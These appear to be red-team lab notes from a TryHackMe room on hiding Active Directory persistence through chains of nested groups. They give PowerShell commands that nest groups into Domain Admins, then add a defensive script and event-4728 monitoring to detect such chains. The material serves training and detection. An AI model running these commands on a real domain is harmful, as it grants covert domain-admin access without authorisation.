==This technique is incredibly invasive and hard to remove. Even if you have signoff on your red team exercise to perform these techniques, you must take the utmost caution when performing these techniques. In real-world scenarios, the exploitation of most of these techniques would result in a full domain rebuild.==
General
In Active Directory (AD), nested groups refer to the practice of placing one group inside another group, also known as a "parent-child" relationship. This allows for more efficient management of user access to resources and easier delegation of administrative tasks.
Nested groups can be used to hide oneself in domain admin groups by creating a new group, adding oneself to that group, and then adding that group to the domain admin group. By doing this, an attacker can gain access to resources that are restricted to domain admin without being directly a member of the domain admin group, and therefore can evade detection.
For example, an attacker can create a new group called "Delegated Admins" and add their own user account to it. Then the attacker can add the "Delegated Admins" group as a member of the "Domain Admins" group. Now the attacker's user account has the same privileges as a member of the "Domain Admins" group, but it's not directly a member of it, and it's harder to detect.
Nested Groups
In many organizations, there are a large number of groups that are members of other groups, known as recursive groups or group nesting. This is used to create a more organized structure in Active Directory (AD). However, this structure also reduces visibility into effective access, making it difficult to understand who has access to what. Additionally, it can make it harder to monitor for changes to privileged groups, as changes to subgroups may not trigger alerts. An attacker can leverage this to maintain persistence by targeting subgroups that are not being monitored, rather than privileged groups that would raise alerts.
Commands
Nesting Our Persistence
- Replace the placeholder group names (GROUPE_NAME, "Net Group", ...) in every command below with names of your choice.
Let's simulate this type of persistence. In order to simulate the persistence, we will create some of our own groups. Let's start by creating a new base group that we will hide in the People->IT Organisational Unit (OU):
PS C:\Users\Administrator.ZA> New-ADGroup -Path "OU=IT,OU=People,DC=ZA,DC=TRYHACKME,DC=LOC" -Name "GROUPE_NAME Net Group 1" -SamAccountName "GROUPE_NAME_nestgroup1" -DisplayName "GROUPE_NAME Nest Group 1" -GroupScope Global -GroupCategory Security
Let's now create another group in the People->Sales OU and add our previous group as a member:
PS C:\Users\Administrator.ZA> New-ADGroup -Path "OU=SALES,OU=People,DC=ZA,DC=TRYHACKME,DC=LOC" -Name "GROUPE_NAME Net Group 2" -SamAccountName "GROUPE_NAME_nestgroup2" -DisplayName "GROUPE_NAME Nest Group 2" -GroupScope Global -GroupCategory Security
PS C:\Users\Administrator.ZA> Add-ADGroupMember -Identity "GROUPE_NAME_nestgroup2" -Members "GROUPE_NAME_nestgroup1"
We can do this a couple more times, every time adding the previous group as a member:
PS C:\Users\Administrator.ZA> New-ADGroup -Path "OU=CONSULTING,OU=PEOPLE,DC=ZA,DC=TRYHACKME,DC=LOC" -Name "GROUPE_NAME Net Group 3" -SamAccountName "GROUPE_NAME_nestgroup3" -DisplayName "GROUPE_NAME Nest Group 3" -GroupScope Global -GroupCategory Security
PS C:\Users\Administrator.ZA> Add-ADGroupMember -Identity "GROUPE_NAME_nestgroup3" -Members "GROUPE_NAME_nestgroup2"
Finally, add the last group in the chain (GROUPE_NAME_nestgroup5 in this example, after repeating the previous step twice more) to the Domain Admins group:
PS C:\Users\Administrator.ZA> Add-ADGroupMember -Identity "Domain Admins" -Members "GROUPE_NAME_nestgroup5"
Add our low-privileged AD user to the first group we created:
PS C:\Users\Administrator.ZA> Add-ADGroupMember -Identity "GROUPE_NAME_nestgroup1" -Members "<low privileged username>"
The low-privileged user should now have privileged access to the DC. From a session as that user, list the administrative share on the DC to confirm:
dir \\thmdc.za.tryhackme.loc\c$\
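The "Nested Groups" section above explains why this chain is hard to spot: Get-ADGroupMember -Recursive flattens the tree and never shows the intermediate groups, so a defender looking at Domain Admins sees only the end user, not the path through five groups spread over different OUs. The following script is an added example written for these notes (it is not part of the original page or the TryHackMe room) that walks the membership tree of a privileged group one level at a time, reports every nested group with its depth, OU and last-modified timestamp, and lists principals that are effective members without being direct members. It assumes the RSAT ActiveDirectory module is installed, an account that can read group membership, and the group name and depth limit you pass in; the function name and output fields are this example's own.

```powershell
# Added example, not from the original notes: make group nesting into a privileged group visible.
# Assumes the RSAT ActiveDirectory module; $GroupName and $MaxDepth are the caller's choice.
Import-Module ActiveDirectory

function Get-GroupNestingPaths {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string] $GroupName,   # e.g. "Domain Admins"
        [int] $MaxDepth = 10                          # stops runaway walks through membership loops
    )

    $root    = Get-ADGroup -Identity $GroupName
    $stack   = New-Object System.Collections.Stack
    $visited = @{}
    # Each stack entry carries the group to expand and the chain of group names above it
    $stack.Push(@{ Group = $root; Path = @($root.Name) })

    while ($stack.Count -gt 0) {
        $entry = $stack.Pop()
        $grp   = $entry.Group
        $path  = $entry.Path
        if ($visited.ContainsKey($grp.DistinguishedName)) { continue }
        $visited[$grp.DistinguishedName] = $true

        # Direct members only: -Recursive would collapse exactly the intermediate groups we want to see
        foreach ($m in Get-ADGroupMember -Identity $grp.DistinguishedName) {
            # Parent OU is the DN with the leading CN=... component removed
            $ou = $m.DistinguishedName -replace '^CN=[^,]+,', ''
            if ($m.objectClass -eq 'group') {
                $sub = Get-ADGroup -Identity $m.DistinguishedName -Properties whenCreated, whenChanged
                [pscustomobject]@{
                    Type        = 'NestedGroup'
                    Name        = $sub.Name
                    Depth       = $path.Count           # 1 = directly inside the root group
                    Path        = ($path + $sub.Name) -join ' <- '
                    OU          = $ou
                    WhenCreated = $sub.whenCreated
                    WhenChanged = $sub.whenChanged
                }
                if ($path.Count -lt $MaxDepth) {
                    $stack.Push(@{ Group = $sub; Path = $path + $sub.Name })
                }
            } else {
                [pscustomobject]@{
                    Type        = 'Principal'
                    Name        = $m.SamAccountName
                    Depth       = $path.Count
                    Path        = ($path + $m.SamAccountName) -join ' <- '
                    OU          = $ou
                    WhenCreated = $null
                    WhenChanged = $null
                }
            }
        }
    }
}

# Usage: nested groups reaching Domain Admins, most recently changed first.
# A freshly built chain like the one in these notes sorts to the top.
$report = Get-GroupNestingPaths -GroupName 'Domain Admins'
$report | Where-Object { $_.Type -eq 'NestedGroup' } |
    Sort-Object WhenChanged -Descending |
    Format-Table Name, Depth, OU, WhenChanged, Path -AutoSize

# Principals that are effectively Domain Admins without being direct members
$report | Where-Object { $_.Type -eq 'Principal' -and $_.Depth -gt 1 } |
    Format-Table Name, Depth, Path -AutoSize

# Server-side cross-check using the transitive matching rule (LDAP_MATCHING_RULE_IN_CHAIN):
# returns every object whose memberOf chain ends at Domain Admins, regardless of depth
$daDn = (Get-ADGroup -Identity 'Domain Admins').DistinguishedName
Get-ADObject -LDAPFilter "(memberOf:1.2.840.113556.1.4.1941:=$daDn)" -Properties objectClass |
    Select-Object Name, objectClass
```

Two practical caveats. Get-ADGroupMember fails on very large groups and on foreign security principals from trusted domains, so the LDAP cross-check at the end is the more robust of the two views; treat any discrepancy between them as something to investigate. Also, because every group in the chain above is created with -GroupScope Global, each Add-ADGroupMember call, including the final one into Domain Admins, produces a security event 4728 ("A member was added to a security-enabled global group") on the domain controller; monitoring that event for all groups, not only for Domain Admins, is what closes the gap the "Nested Groups" section describes.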